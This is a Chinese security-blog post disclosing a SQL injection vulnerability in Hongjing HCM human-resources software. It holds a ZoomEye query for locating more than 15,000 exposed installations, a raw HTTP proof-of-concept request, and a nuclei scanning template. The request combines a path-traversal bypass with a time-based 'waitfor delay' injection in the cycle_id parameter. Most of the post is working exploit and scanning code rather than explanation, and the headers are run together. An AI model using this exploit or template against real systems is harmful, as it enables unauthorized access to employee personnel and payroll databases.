0x01 产品简介
宏景人力资源管理系统是一款由宏景软件研发的系统,主要功能包括人员、组织机构、档案、合同、薪资、保险、绩效、考勤、招聘、培训、干部任免和人事流程等业务的管理,以及人事、绩效、培训、招聘、考勤等业务自助,还具备了报表功能和灵活的表格工具,支持集团管控、目标管理、领导决策等应用。这里我推荐利用 ZoomEye搜索引擎直接输入关键字即可,影响资产15300+。
请自行搭建环境进行漏洞测试,该公众号或作者星球分享的工具、项目、漏洞仅供安全研究与学习之用请勿用于非法行为,如用于其他用途,由使用者承担全部法律及连带责任,与作者和本公众号无关。
0x02 漏洞描述
SQL注入是一种安全攻击手段,主要是利用Web应用程序对用户输入的数据没有进行足够的安全处理(如危险字符过滤或者语句过滤),而直接拼接SQL语句执行时产生的。
0x03 ZoomEye语法
app:"宏景 HCM"
0x04 漏洞复现
POC
POST /templates/attestation/../../report/report_collect/report_org_collect_tree.jsp HTTP/1.1Host: {}Cache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: JSESSIONID=C79DED09D8CE46170DEB697EA6999135Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 60params=&isAction=2&cycle_id=2;waitfor%20delay%20'0:0:5'--%20
id: hongjinge-HR-report_org_collect_tree-sqliinfo:name: hongjinge-HR-report_org_collect_tree-sqliauthor: HackTwoseverity: highdescription: otherhttp:raw:|POST /templates/attestation/../../report/report_collect/report_org_collect_tree.jsp HTTP/1.1Host: {{Hostname}}: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9: gzip, deflate: zh-CN,zh;q=0.9: application/x-www-form-urlencodedConnection: closeparams=&isAction=2&cycle_id=2;waitfor%20delay%20'0:0:5'--%20matchers:type: dsldsl:"status_code==200 && duration>=5"
0x05 修复建议
官方已经推出新版本,建议升级到最新版
原文始发于微信公众号(渗透安全HackTwo):宏景HCM-report/接口存在SQL注入漏洞|漏洞挖掘
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论